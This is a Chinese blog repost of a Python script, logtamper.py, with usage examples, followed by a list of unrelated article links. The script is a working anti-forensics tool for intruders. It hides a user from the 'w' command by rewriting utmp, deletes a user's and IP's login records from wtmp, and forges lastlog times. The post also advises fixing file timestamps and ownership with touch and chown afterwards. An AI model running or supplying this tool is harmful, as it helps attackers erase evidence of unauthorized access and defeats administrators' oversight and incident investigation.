python修改linux日志(logtamper.py)
来源:互联网 发布:java调用weka神经网络 编辑:程序博客网 时间:2024/06/18 04:35
经常用到xi4oyu大神的logtamper,非常之方便。但是有些场景下可能没条件编译、于是参照logtamper源码以及Intersect的源码写了个py版,参数和原版差不多。
躲避管理员w查看
python logtamper.py -m 1 -u b4dboy -i 192.168.0.188
清除指定ip的登录日志
python logtamper.py -m 2 -u b4dboy -i 192.168.0.188
修改上次登录时间地点
python logtamper.py -m 3 -u b4dboy -i 192.168.0.188 -t tty1 -d 2014:05:28:10:11:12
最后自己再确认下看有没有修改成功,可以使用chown、touch命令修改时间和使用者,程序代码如下:
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123
#!/usr/bin/env python# -*- coding:utf-8 -*-# mail: cn.b4dboy@gmail.comimport os, struct, sysfrom pwd import getpwnamfrom time import strptime, mktimefrom optparse import OptionParserUTMPFILE = "/var/run/utmp"WTMPFILE = "/var/log/wtmp"LASTLOGFILE = "/var/log/lastlog"LAST_STRUCT = 'I32s256s'LAST_STRUCT_SIZE = struct.calcsize(LAST_STRUCT)XTMP_STRUCT = 'hi32s4s32s256shhiii4i20x'XTMP_STRUCT_SIZE = struct.calcsize(XTMP_STRUCT)def getXtmp(filename, username, hostname): xtmp = '' try: fp = open(filename, 'rb') while True: bytes = fp.read(XTMP_STRUCT_SIZE) if not bytes: break data = struct.unpack(XTMP_STRUCT, bytes) record = [(lambda s: str(s).split("\0", 1)[0])(i) for i in data] if (record[4] == username and record[5] == hostname): continue xtmp += bytes except: showMessage('Cannot open file: %s' % filename) finally: fp.close() return xtmpdef modifyLast(filename, username, hostname, ttyname, strtime): try: p = getpwnam(username) except: showMessage('No such user.') timestamp = 0 try: str2time = strptime(strtime, '%Y:%m:%d:%H:%M:%S') timestamp = int(mktime(str2time)) except: showMessage('Time format err.') data = struct.pack(LAST_STRUCT, timestamp, ttyname, hostname) try: fp = open(filename, 'wb') fp.seek(LAST_STRUCT_SIZE * p.pw_uid) fp.write(data) except: showMessage('Cannot open file: %s' % filename) finally: fp.close() return Truedef showMessage(msg): print msg exit(-1)def saveFile(filename, contents): try: fp = open(filename, 'w+b') fp.write(contents) except IOError as e: showMessage(e) finally: fp.close()if __name__ == '__main__': usage = 'usage: logtamper.py -m 2 -u b4dboy -i 192.168.0.188\n \ logtamper.py -m 3 -u b4dboy -i 192.168.0.188 -t tty1 -d 2015:05:28:10:11:12' parser = OptionParser(usage=usage) parser.add_option('-m', '--mode', dest='MODE', default='1' , help='1: utmp, 2: wtmp, 3: lastlog [default: 1]') parser.add_option('-t', '--ttyname', dest='TTYNAME') parser.add_option('-f', '--filename', dest='FILENAME') parser.add_option('-u', '--username', dest='USERNAME') parser.add_option('-i', '--hostname', dest='HOSTNAME') parser.add_option('-d', '--dateline', dest='DATELINE') (options, args) = parser.parse_args() if len(args) < 3: if options.MODE == '1': if options.USERNAME == None or options.HOSTNAME == None: showMessage('+[Warning]: Incorrect parameter.\n') if options.FILENAME == None: options.FILENAME = UTMPFILE # tamper newData = getXtmp(options.FILENAME, options.USERNAME, options.HOSTNAME) saveFile(options.FILENAME, newData) elif options.MODE == '2': if options.USERNAME == None or options.HOSTNAME == None: showMessage('+[Warning]: Incorrect parameter.\n') if options.FILENAME == None: options.FILENAME = WTMPFILE # tamper newData = getXtmp(options.FILENAME, options.USERNAME, options.HOSTNAME) saveFile(options.FILENAME, newData) elif options.MODE == '3': if options.USERNAME == None or options.HOSTNAME == None or options.TTYNAME == None or options.DATELINE == None: showMessage('+[Warning]: Incorrect parameter.\n') if options.FILENAME == None: options.FILENAME = LASTLOGFILE # tamper modifyLast(options.FILENAME, options.USERNAME, options.HOSTNAME, options.TTYNAME , options.DATELINE) else: parser.print_help()
0 0
- python修改linux日志(logtamper.py)
- Linux日志更改 logtamper
- logtamper-v1.0 修改linux 日志的工具
- <PY>Python修改excel
- Linux配置Lighttpd+Python+web.py应用
- py日志输出
- 用freeze.py打包python程序成可执行程序(linux)
- linux下nginx+python+fastcgi部署总结(web.py版)
- Linux直接./xx.py执行python脚本时报错
- py 批量修改文件名
- convert_to_records.py路径修改
- py- faster rcnn修改demo.py
- tomcat在linux中修改日志路径
- 基于Python SimpleHTTPServer.py的修改脚本:HTTP文件服务器,修正中文目录列表,支持视频文件在线播放
- python核心编程二十章例题asvcgi.py中的错误与修改
- 边学边用python-searchs.py
- python __init__.py
- python __init__.py
- IOS 多线程编程指南之NSThread
- SQL注入
- Android性能常用的测试工具(黑盒)
- UGUI DOTween渐隐渐现
- java笔试题知识点整理(持续更新...)
- python修改linux日志(logtamper.py)
- pandas基础操作
- oracle保留两位小数
- uva 11464
- iOS 下拉菜单
- poj1639+最小k度限制生成树
- CKEditor 使用技巧
- 编写高质量的 HTML 代码
- 花生壳+QNAP NAS,轻松创建私有云盘